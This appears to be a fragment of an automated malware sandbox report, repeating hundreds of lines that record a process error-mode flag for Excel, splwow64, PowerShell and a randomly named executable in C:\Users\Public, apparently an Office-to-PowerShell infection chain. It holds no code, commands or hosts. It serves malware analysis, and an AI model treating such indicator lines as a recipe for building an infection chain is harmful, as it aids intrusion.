          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
